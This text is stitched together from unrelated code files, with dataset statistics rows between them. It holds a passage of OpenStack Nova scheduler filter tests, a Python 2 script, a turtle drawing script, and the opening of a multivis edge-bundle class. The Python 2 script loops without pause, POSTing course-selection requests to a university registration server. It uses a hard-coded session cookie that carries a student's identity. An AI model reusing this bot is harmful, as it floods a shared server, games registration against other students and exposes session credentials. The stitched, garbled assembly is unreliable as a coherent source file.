    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_extra_specs(self):
    """ComputeCapabilitiesFilter fails when an extra_spec mismatches."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['ComputeCapabilitiesFilter']()
    # 'opt2' requests 3 but the host only offers 2.
    extra_specs = {'opt1': 1, 'opt2': 3}
    capabilities = {'enabled': True, 'opt1': 1, 'opt2': 2}
    service = {'disabled': False}
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'extra_specs': extra_specs}}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_isolated_hosts_fails_isolated_on_non_isolated(self):
    """An isolated image must not land on a non-isolated host."""
    self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
    host_filter = self.class_map['IsolatedHostsFilter']()
    instance_properties = {'image_ref': 'isolated'}
    filter_properties = {
        'request_spec': {'instance_properties': instance_properties},
    }
    host_state = fakes.FakeHostState('non-isolated', 'compute', {})
    self.assertFalse(host_filter.host_passes(host_state, filter_properties))
def test_isolated_hosts_fails_non_isolated_on_isolated(self):
    """A non-isolated image must not land on an isolated host."""
    self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
    filt_cls = self.class_map['IsolatedHostsFilter']()
    filter_properties = {
        'request_spec': {
            'instance_properties': {'image_ref': 'non-isolated'}
        }
    }
    host = fakes.FakeHostState('isolated', 'compute', {})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_isolated_hosts_passes_isolated_on_isolated(self):
    """An isolated image on an isolated host passes."""
    self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
    filt_cls = self.class_map['IsolatedHostsFilter']()
    filter_properties = {
        'request_spec': {
            'instance_properties': {'image_ref': 'isolated'}
        }
    }
    host = fakes.FakeHostState('isolated', 'compute', {})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_isolated_hosts_passes_non_isolated_on_non_isolated(self):
    """A non-isolated image on a non-isolated host passes."""
    self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
    filt_cls = self.class_map['IsolatedHostsFilter']()
    filter_properties = {
        'request_spec': {
            'instance_properties': {'image_ref': 'non-isolated'}
        }
    }
    host = fakes.FakeHostState('non-isolated', 'compute', {})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_json_filter_passes(self):
    """JsonFilter passes a host meeting the RAM and disk thresholds."""
    filt_cls = self.class_map['JsonFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'root_gb': 200,
                                           'ephemeral_gb': 0},
                         'scheduler_hints': {'query': self.json_query}}
    capabilities = {'enabled': True}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'free_disk_mb': 200 * 1024,
                                'capabilities': capabilities})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_json_filter_passes_with_no_query(self):
    """Without a query hint JsonFilter passes regardless of resources."""
    filt_cls = self.class_map['JsonFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'root_gb': 200,
                                           'ephemeral_gb': 0}}
    capabilities = {'enabled': True}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 0,
                                'free_disk_mb': 0,
                                'capabilities': capabilities})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_memory(self):
    """JsonFilter fails when free RAM is below the query threshold."""
    filt_cls = self.class_map['JsonFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'root_gb': 200,
                                           'ephemeral_gb': 0},
                         'scheduler_hints': {'query': self.json_query}}
    capabilities = {'enabled': True}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1023,
                                'free_disk_mb': 200 * 1024,
                                'capabilities': capabilities})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_disk(self):
    """JsonFilter fails when free disk is below the query threshold."""
    filt_cls = self.class_map['JsonFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'root_gb': 200,
                                           'ephemeral_gb': 0},
                         'scheduler_hints': {'query': self.json_query}}
    capabilities = {'enabled': True}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'free_disk_mb': (200 * 1024) - 1,
                                'capabilities': capabilities})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_caps_disabled(self):
    """A query referencing $capabilities.enabled fails when disabled."""
    filt_cls = self.class_map['JsonFilter']()
    json_query = jsonutils.dumps(
        ['and', ['>=', '$free_ram_mb', 1024],
                ['>=', '$free_disk_mb', 200 * 1024],
                '$capabilities.enabled'])
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'root_gb': 200,
                                           'ephemeral_gb': 0},
                         'scheduler_hints': {'query': json_query}}
    capabilities = {'enabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'free_disk_mb': 200 * 1024,
                                'capabilities': capabilities})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_service_disabled(self):
    """A query with ['not', '$service.disabled'] fails for this host."""
    filt_cls = self.class_map['JsonFilter']()
    json_query = jsonutils.dumps(
        ['and', ['>=', '$free_ram_mb', 1024],
                ['>=', '$free_disk_mb', 200 * 1024],
                ['not', '$service.disabled']])
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'local_gb': 200},
                         'scheduler_hints': {'query': json_query}}
    capabilities = {'enabled': True}
    # NOTE(review): 'service' is built but never passed into the host
    # state below — likely meant to be included alongside
    # 'capabilities'; confirm against the JsonFilter implementation.
    service = {'disabled': True}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'free_disk_mb': 200 * 1024,
                                'capabilities': capabilities})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_happy_day(self):
    """Test json filter more thoroughly.

    Exercises one nested query (capabilities enabled, opt1 matches, and
    RAM/disk both below 30/300 or both above) against six host states.
    """
    filt_cls = self.class_map['JsonFilter']()
    raw = ['and',
           '$capabilities.enabled',
           ['=', '$capabilities.opt1', 'match'],
           ['or',
            ['and',
             ['<', '$free_ram_mb', 30],
             ['<', '$free_disk_mb', 300]],
            ['and',
             ['>', '$free_ram_mb', 30],
             ['>', '$free_disk_mb', 300]]]]
    filter_properties = {
        'scheduler_hints': {
            'query': jsonutils.dumps(raw),
        },
    }

    # Passes
    capabilities = {'enabled': True, 'opt1': 'match'}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 10,
                                'free_disk_mb': 200,
                                'capabilities': capabilities,
                                'service': service})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))

    # Passes
    capabilities = {'enabled': True, 'opt1': 'match'}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 40,
                                'free_disk_mb': 400,
                                'capabilities': capabilities,
                                'service': service})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))

    # Fails due to capabilities being disabled
    capabilities = {'enabled': False, 'opt1': 'match'}
    service = {'disabled': False}
    # NOTE(review): topic 'instance_type' here differs from the
    # 'compute' used everywhere else — looks accidental; confirm.
    host = fakes.FakeHostState('host1', 'instance_type',
                               {'free_ram_mb': 40,
                                'free_disk_mb': 400,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))

    # Fails due to being exact memory/disk we don't want
    capabilities = {'enabled': True, 'opt1': 'match'}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 30,
                                'free_disk_mb': 300,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))

    # Fails due to memory lower but disk higher
    capabilities = {'enabled': True, 'opt1': 'match'}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 20,
                                'free_disk_mb': 400,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))

    # Fails due to capabilities 'opt1' not equal
    capabilities = {'enabled': True, 'opt1': 'no-match'}
    # NOTE(review): key 'enabled' differs from the 'disabled' key used
    # in the other service fixtures above — possibly unintended.
    service = {'enabled': True}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 20,
                                'free_disk_mb': 400,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_basic_operators(self):
    """Table-driven check of every JsonFilter query operator."""
    filt_cls = self.class_map['JsonFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': {'enabled': True}})
    # (operator, arguments, expected_result)
    ops_to_test = [
        ['=', [1, 1], True],
        ['=', [1, 2], False],
        ['<', [1, 2], True],
        ['<', [1, 1], False],
        ['<', [2, 1], False],
        ['>', [2, 1], True],
        ['>', [2, 2], False],
        ['>', [2, 3], False],
        ['<=', [1, 2], True],
        ['<=', [1, 1], True],
        ['<=', [2, 1], False],
        ['>=', [2, 1], True],
        ['>=', [2, 2], True],
        ['>=', [2, 3], False],
        ['in', [1, 1], True],
        ['in', [1, 1, 2, 3], True],
        ['in', [4, 1, 2, 3], False],
        ['not', [True], False],
        ['not', [False], True],
        ['or', [True, False], True],
        ['or', [False, False], False],
        ['and', [True, True], True],
        ['and', [False, False], False],
        ['and', [True, False], False],
        # Nested ((True or False) and (2 > 1)) == Passes
        ['and', [['or', True, False], ['>', 2, 1]], True]]

    for (op, args, expected) in ops_to_test:
        raw = [op] + args
        filter_properties = {
            'scheduler_hints': {
                'query': jsonutils.dumps(raw),
            },
        }
        self.assertEqual(expected,
                         filt_cls.host_passes(host, filter_properties))

    # This results in [False, True, False, True] and if any are True
    # then it passes...
    raw = ['not', True, False, True, False]
    filter_properties = {
        'scheduler_hints': {
            'query': jsonutils.dumps(raw),
        },
    }
    self.assertTrue(filt_cls.host_passes(host, filter_properties))

    # This results in [False, False, False] and if any are True
    # then it passes...which this doesn't
    raw = ['not', True, True, True]
    filter_properties = {
        'scheduler_hints': {
            'query': jsonutils.dumps(raw),
        },
    }
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_unknown_operator_raises(self):
    """An unrecognised operator ('!=') must raise KeyError."""
    filt = self.class_map['JsonFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': {'enabled': True}})
    props = {'scheduler_hints': {'query': jsonutils.dumps(['!=', 1, 2])}}
    self.assertRaises(KeyError,
                      filt.host_passes, host, props)
def test_json_filter_empty_filters_pass(self):
    """Empty queries (list or dict) place no constraints on the host."""
    filt = self.class_map['JsonFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': {'enabled': True}})
    for empty_query in ([], {}):
        props = {'scheduler_hints': {'query': jsonutils.dumps(empty_query)}}
        self.assertTrue(filt.host_passes(host, props))
def test_json_filter_invalid_num_arguments_fails(self):
    """Operators invoked with too few arguments evaluate to False."""
    filt = self.class_map['JsonFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': {'enabled': True}})
    bad_queries = (
        # Deeply nested operator chain whose innermost 'in' has no operands.
        ['>', ['and', ['or', ['not', ['<', ['>=', ['<=', ['in', ]]]]]]]],
        # '>' needs two operands but only gets one.
        ['>', 1],
    )
    for raw in bad_queries:
        props = {'scheduler_hints': {'query': jsonutils.dumps(raw)}}
        self.assertFalse(filt.host_passes(host, props))
def test_json_filter_unknown_variable_ignored(self):
    """Unresolvable '$...' variables are dropped from the comparison."""
    filt = self.class_map['JsonFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': {'enabled': True}})
    for raw in (['=', '$........', 1, 1],
                ['=', '$foo', 2, 2]):
        props = {'scheduler_hints': {'query': jsonutils.dumps(raw)}}
        self.assertTrue(filt.host_passes(host, props))
def test_trusted_filter_default_passes(self):
    """Without a trust requirement in the flavor, every host passes."""
    self._stub_service_is_up(True)
    filt = self.class_map['TrustedFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    self.assertTrue(filt.host_passes(host,
                                     {'instance_type': {'memory_mb': 1024}}))
def test_trusted_filter_trusted_and_trusted_passes(self):
    """Flavor asks for a trusted host and the host reports trusted."""
    global DATA
    DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"trusted"}]}'
    self._stub_service_is_up(True)
    filt = self.class_map['TrustedFilter']()
    props = {'instance_type': {'memory_mb': 1024,
                               'extra_specs': {'trusted_host': 'trusted'}}}
    host = fakes.FakeHostState('host1', 'compute', {})
    self.assertTrue(filt.host_passes(host, props))
def test_trusted_filter_trusted_and_untrusted_fails(self):
    """Flavor asks for a trusted host but the host reports untrusted."""
    global DATA
    DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"untrusted"}]}'
    self._stub_service_is_up(True)
    filt = self.class_map['TrustedFilter']()
    props = {'instance_type': {'memory_mb': 1024,
                               'extra_specs': {'trusted_host': 'trusted'}}}
    host = fakes.FakeHostState('host1', 'compute', {})
    self.assertFalse(filt.host_passes(host, props))
def test_trusted_filter_untrusted_and_trusted_fails(self):
    """Flavor asks for an untrusted host but the host reports trusted."""
    global DATA
    DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"trusted"}]}'
    self._stub_service_is_up(True)
    filt = self.class_map['TrustedFilter']()
    props = {'instance_type': {'memory_mb': 1024,
                               'extra_specs': {'trusted_host': 'untrusted'}}}
    host = fakes.FakeHostState('host1', 'compute', {})
    self.assertFalse(filt.host_passes(host, props))
def test_trusted_filter_untrusted_and_untrusted_passes(self):
    """Flavor accepts an untrusted host and the host reports untrusted."""
    global DATA
    DATA = '{"hosts":[{"host_name":"host1","trust_lvl":"untrusted"}]}'
    self._stub_service_is_up(True)
    filt = self.class_map['TrustedFilter']()
    props = {'instance_type': {'memory_mb': 1024,
                               'extra_specs': {'trusted_host': 'untrusted'}}}
    host = fakes.FakeHostState('host1', 'compute', {})
    self.assertTrue(filt.host_passes(host, props))
def test_core_filter_passes(self):
    """7 used + 1 requested fits within 4 cores * allocation ratio 2."""
    self.flags(cpu_allocation_ratio=2)
    filt = self.class_map['CoreFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'vcpus_total': 4, 'vcpus_used': 7})
    self.assertTrue(filt.host_passes(host, {'instance_type': {'vcpus': 1}}))
def test_core_filter_fails_safe(self):
    """A host reporting no vcpu statistics is let through, not rejected."""
    filt = self.class_map['CoreFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    self.assertTrue(filt.host_passes(host, {'instance_type': {'vcpus': 1}}))
def test_core_filter_fails(self):
    """8 used + 1 requested exceeds 4 cores * allocation ratio 2."""
    self.flags(cpu_allocation_ratio=2)
    filt = self.class_map['CoreFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'vcpus_total': 4, 'vcpus_used': 8})
    self.assertFalse(filt.host_passes(host, {'instance_type': {'vcpus': 1}}))
@staticmethod
def _make_zone_request(zone, is_admin=False):
    """Build a minimal filter request targeting availability zone `zone`."""
    ctxt = context.RequestContext('fake', 'fake', is_admin=is_admin)
    instance_properties = {'availability_zone': zone}
    return {'context': ctxt,
            'request_spec': {'instance_properties': instance_properties}}
def test_availability_zone_filter_same(self):
    """A host whose service zone matches the requested zone passes."""
    filt = self.class_map['AvailabilityZoneFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'service': {'availability_zone': 'nova'}})
    self.assertTrue(filt.host_passes(host, self._make_zone_request('nova')))
def test_availability_zone_filter_different(self):
    """A host whose service zone differs from the request is rejected."""
    filt = self.class_map['AvailabilityZoneFilter']()
    host = fakes.FakeHostState('host1', 'compute',
                               {'service': {'availability_zone': 'nova'}})
    self.assertFalse(filt.host_passes(host, self._make_zone_request('bad')))
def test_arch_filter_same(self):
    """An x86_64 instance passes on a host that permits x86_64."""
    filt = self.class_map['ArchFilter']()
    props = {'request_spec':
             {'instance_properties': {'architecture': 'x86_64'}}}
    caps = {'enabled': True,
            'cpu_info': {'permitted_instance_types': ['x86_64']}}
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': caps,
                                'service': {'disabled': False}})
    self.assertTrue(filt.host_passes(host, props))
def test_arch_filter_different(self):
    """An x86_64 instance is rejected by a host that only permits arm."""
    filt = self.class_map['ArchFilter']()
    props = {'request_spec':
             {'instance_properties': {'architecture': 'x86_64'}}}
    caps = {'enabled': True,
            'cpu_info': {'permitted_instance_types': ['arm']}}
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': caps,
                                'service': {'disabled': False}})
    self.assertFalse(filt.host_passes(host, props))
def test_arch_filter_without_permitted_instances(self):
    """A host advertising no permitted instance types rejects everything."""
    filt = self.class_map['ArchFilter']()
    props = {'request_spec':
             {'instance_properties': {'architecture': 'x86_64'}}}
    caps = {'enabled': True,
            'cpu_info': {'permitted_instance_types': []}}
    host = fakes.FakeHostState('host1', 'compute',
                               {'capabilities': caps,
                                'service': {'disabled': False}})
    self.assertFalse(filt.host_passes(host, props))
def test_retry_filter_disabled(self):
    """Test case where retry/re-scheduling is disabled."""
    filt = self.class_map['RetryFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    self.assertTrue(filt.host_passes(host, {}))
def test_retry_filter_pass(self):
    """A host that was not previously tried passes the retry filter."""
    filt = self.class_map['RetryFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    props = {'retry': {'num_attempts': 1, 'hosts': ['host2', 'host3']}}
    self.assertTrue(filt.host_passes(host, props))
def test_retry_filter_fail(self):
    """A host that was already tried is rejected by the retry filter."""
    filt = self.class_map['RetryFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    props = {'retry': {'num_attempts': 1, 'hosts': ['host3', 'host1']}}
    self.assertFalse(filt.host_passes(host, props))
| 43.069414
| 79
| 0.572627
| 3,936
| 39,710
| 5.495681
| 0.089431
| 0.039804
| 0.03458
| 0.053442
| 0.8363
| 0.823217
| 0.81337
| 0.795849
| 0.779853
| 0.747446
| 0
| 0.018241
| 0.30005
| 39,710
| 921
| 80
| 43.116178
| 0.759993
| 0.046235
| 0
| 0.656043
| 0
| 0
| 0.163373
| 0.020637
| 0
| 0
| 0
| 0
| 0.096946
| 1
| 0.084993
| false
| 0.118194
| 0.015936
| 0.003984
| 0.111554
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c4c8d79be5e07ecfdbbae83201e30069b79d7435
| 4,106
|
py
|
Python
|
get.py
|
chen86860/WYUStudentSocreCalculator
|
0437b6ebd7caccf6820a97e08b5d4818383cf7e2
|
[
"MIT"
] | null | null | null |
get.py
|
chen86860/WYUStudentSocreCalculator
|
0437b6ebd7caccf6820a97e08b5d4818383cf7e2
|
[
"MIT"
] | null | null | null |
get.py
|
chen86860/WYUStudentSocreCalculator
|
0437b6ebd7caccf6820a97e08b5d4818383cf7e2
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
__author__ = '星星'
import urllib
import urllib2
import cookielib
import string
# NOTE(review): This is Python 2 code (urllib/urllib2 and the `print`
# statement). It repeatedly POSTs a course-selection form to a university
# registration system using a hard-coded session cookie.

# Endpoint that saves a course selection; Referer mimics the normal flow.
TskUrl = "http://202.192.240.54/tbx/tsk/savesel.aspx"
User_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36"
Refere = "http://202.192.240.54/tbx/tsk/confirm.aspx"
# URL-encoded course identifiers to attempt, apparently in the form
# "<course_code>_<slot>_<percent-encoded course name>_<credits>"
# — TODO confirm the field layout against the server.
jingguan=[
    "0103950_0_%e5%88%9b%e4%b8%9a%e7%ae%a1%e7%90%86%e4%b8%8e%e5%95%86%e4%b8%9a%e6%a8%a1%e5%bc%8f_0.5",
    "0103980_0_%e5%a4%a7%e5%ad%a6%e7%94%9f%e8%87%aa%e6%88%91%e7%ae%a1%e7%90%86_0.5",
    "0100340_0_%e5%bd%93%e4%bb%a3%e5%9b%bd%e9%99%85%e9%87%91%e8%9e%8d%e5%af%bc%e8%ae%ba_0.5",
    "0100350_0_%e5%bd%93%e4%bb%a3%e5%9b%bd%e9%99%85%e8%b4%b8%e6%98%93%e5%af%bc%e8%ae%ba_0.5",
    "0100350_1_%e5%bd%93%e4%bb%a3%e5%9b%bd%e9%99%85%e8%b4%b8%e6%98%93%e5%af%bc%e8%ae%ba_0.5",
    "0100390_0_%e7%ae%a1%e7%90%86%e7%90%86%e8%ae%ba%e5%af%bc%e8%ae%ba_0.25",
    "0100390_1_%e7%ae%a1%e7%90%86%e7%90%86%e8%ae%ba%e5%af%bc%e8%ae%ba_0.25",
    "0100430_0_%e4%bc%9a%e8%ae%a1%e5%ad%a6%e5%af%bc%e8%ae%ba_0.5",
    "0100430_1_%e4%bc%9a%e8%ae%a1%e5%ad%a6%e5%af%bc%e8%ae%ba_0.5",
    "0100330_0_%e7%bb%8f%e6%b5%8e%e5%ad%a6%e5%af%bc%e8%ae%ba_0.25",
    "0100470_0_%e4%ba%ba%e5%8a%9b%e8%b5%84%e6%ba%90%e7%ae%a1%e7%90%86%e5%af%bc%e8%ae%ba_0.25",
    "0100440_0_%e7%a8%8e%e6%94%b6%e5%ad%a6%e5%af%bc%e8%ae%ba_0.25",
    "0100440_1_%e7%a8%8e%e6%94%b6%e5%ad%a6%e5%af%bc%e8%ae%ba_0.25",
    "0100460_0_%e7%89%a9%e6%b5%81%e7%ae%a1%e7%90%86%e5%af%bc%e8%ae%ba_0.25"
]
# Retained sample cookies from earlier sessions (kept for reference):
# Cookie="""ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry; 3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=0300410_0_%e6%95%99%e5%b8%88%e5%8f%a3%e8%af%ad_0.5"""
# Cookie2="""ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry;3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=0300410_0_%e6%95%99%e5%b8%88%e5%8f%a3%e8%af%ad_0.5"""
# Cookie3="""ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry; 3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=0200230_2_%e7%94%9f%e5%91%bd%e6%95%99%e8%82%b2_0.5"""
# Loop forever, re-submitting the selection form for every course in turn.
# NOTE(review): there is no delay between requests, so this hammers the
# server continuously until killed.
while True:
    for cast in jingguan:
        # Session cookie with the chosen course appended to the XZKC field.
        Cookie = """ASP.NET_SessionId=jdmcmcirnxpui355epnt3kry; 3113003893=STINFO=3113003893%7c%e9%99%88%e9%be%99%7c%e7%94%b7%7c2013%7c%e7%94%b5%e5%ad%90%e4%bf%a1%e6%81%af%e5%b7%a5%e7%a8%8b(%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8)%7c130807%7c130807%7c8%7c28%7c%7c06&ULIMIT=28&CET=0400303$0400320$0400342$0400351$0400430$0400470$0400440$0401650$0401690$0401720$0401730$0401740$0401750$0401630$0401640&DEZY=&ZXXK=; 3113003893_XZKC=XZKC=""" + cast
        headers = {
            "User-agent":User_agent,
            "Referer":Refere,
            "Cookie":Cookie
        }
        # POST body; the ASP.NET viewstate fields were disabled at some point.
        # "Button1" carries the submit button's label (the course-confirm button).
        values ={
            # "__VIEWSTATE":"/wEPDwUIMjczNjAxNzUPZBYCAgMPZBYCAgMPZBYCAgEPZBYGZg8PFgIeBFRleHQFCTAzMDA0MjBfM2RkAgEPDxYCHwAFCeWPo+aJjeWtpmRkAgIPDxYCHwAFAzAuNWRkZKTF4DfxRaba0KNWAIXZsbnijlZL",
            # "__VIEWSTATEGENERATOR":"1D48D657",
            # "__EVENTVALIDATION":"/wEWAgKq1/3gBgKM54rGBqcjNmloBijE3gMkwBCguYcjeibv",
            "Button1":"确定选课"
        }
        data = urllib.urlencode(values)
        # (sic) "requset" — the misspelled local name is kept byte-identical.
        requset = urllib2.Request(url=TskUrl,data=data,headers=headers)
        response = urllib2.urlopen(requset)
        print response.read()
| 83.795918
| 477
| 0.709937
| 803
| 4,106
| 3.541719
| 0.219178
| 0.022504
| 0.029536
| 0.033755
| 0.668425
| 0.668425
| 0.659986
| 0.645218
| 0.645218
| 0.63045
| 0
| 0.366844
| 0.081831
| 4,106
| 49
| 478
| 83.795918
| 0.387533
| 0.420848
| 0
| 0
| 0
| 0.410256
| 0.703501
| 0.603543
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.102564
| null | null | 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4cc7c0a26bdb08f518075da003699866129499a
| 173
|
py
|
Python
|
Lesson_1/square.py
|
LPetrova/Python
|
0be5939ecfc5f0fecce33fee314bfe534aed8efd
|
[
"MIT"
] | null | null | null |
Lesson_1/square.py
|
LPetrova/Python
|
0be5939ecfc5f0fecce33fee314bfe534aed8efd
|
[
"MIT"
] | null | null | null |
Lesson_1/square.py
|
LPetrova/Python
|
0be5939ecfc5f0fecce33fee314bfe534aed8efd
|
[
"MIT"
] | null | null | null |
import turtle

# Side length of the square, in pixels.
size = 70

# Draw a square: four equal sides, turning 90 degrees left after each.
# (Replaces the original copy-pasted forward/left sequence repeated 4x.)
for _ in range(4):
    turtle.forward(size)
    turtle.left(90)
| 14.416667
| 20
| 0.774566
| 28
| 173
| 4.785714
| 0.25
| 0.38806
| 0.507463
| 0.686567
| 0.865672
| 0.865672
| 0.865672
| 0.865672
| 0.865672
| 0.865672
| 0
| 0.062893
| 0.080925
| 173
| 12
| 21
| 14.416667
| 0.779874
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c4d44c8e2022a088efaf358e9577cedf3925722b
| 177,920
|
py
|
Python
|
multivis/edgeBundle.py
|
brettChapman/cimcb_vis
|
b373ed426b24ece1dcc20febd7c8023921b024d6
|
[
"MIT"
] | null | null | null |
multivis/edgeBundle.py
|
brettChapman/cimcb_vis
|
b373ed426b24ece1dcc20febd7c8023921b024d6
|
[
"MIT"
] | null | null | null |
multivis/edgeBundle.py
|
brettChapman/cimcb_vis
|
b373ed426b24ece1dcc20febd7c8023921b024d6
|
[
"MIT"
] | null | null | null |
import os
import sys
from string import Template
import numpy as np
import pandas as pd
import copy
import webbrowser as wb
import matplotlib
import matplotlib.pyplot as plt
from .utils import *
class edgeBundle:
usage = """Produces an interactive hierarchical edge bundle in D3.js, from nodes and edges.
Parameters
----------
nodes : Pandas dataframe containing nodes generated from Edge.
edges : Pandas dataframe containing edges generated from Edge.
Methods
-------
set_params : Set parameters -
html_file: Name to save the HTML file as (default: 'hEdgeBundle.html')
innerRadiusOffset: Sets the inner radius based on the offset value from the canvas width/diameter (default: 120)
blockSeparation: Value to set the distance between different segmented blocks (default: 1)
linkFadeOpacity: The link fade opacity when hovering over/clicking nodes (default: 0.05)
mouseOver: Setting to 'True' swaps from clicking to hovering over nodes to select them (default: True)
fontSize: The font size in pixels set for each node (default: 10)
backgroundColor: Set the background colour of the plot (default: 'white')
foregroundColor: Set the foreground colour of the plot (default: 'black')
node_data: Peak Table column names to include in the mouse over information (default: 'Name' and 'Label')
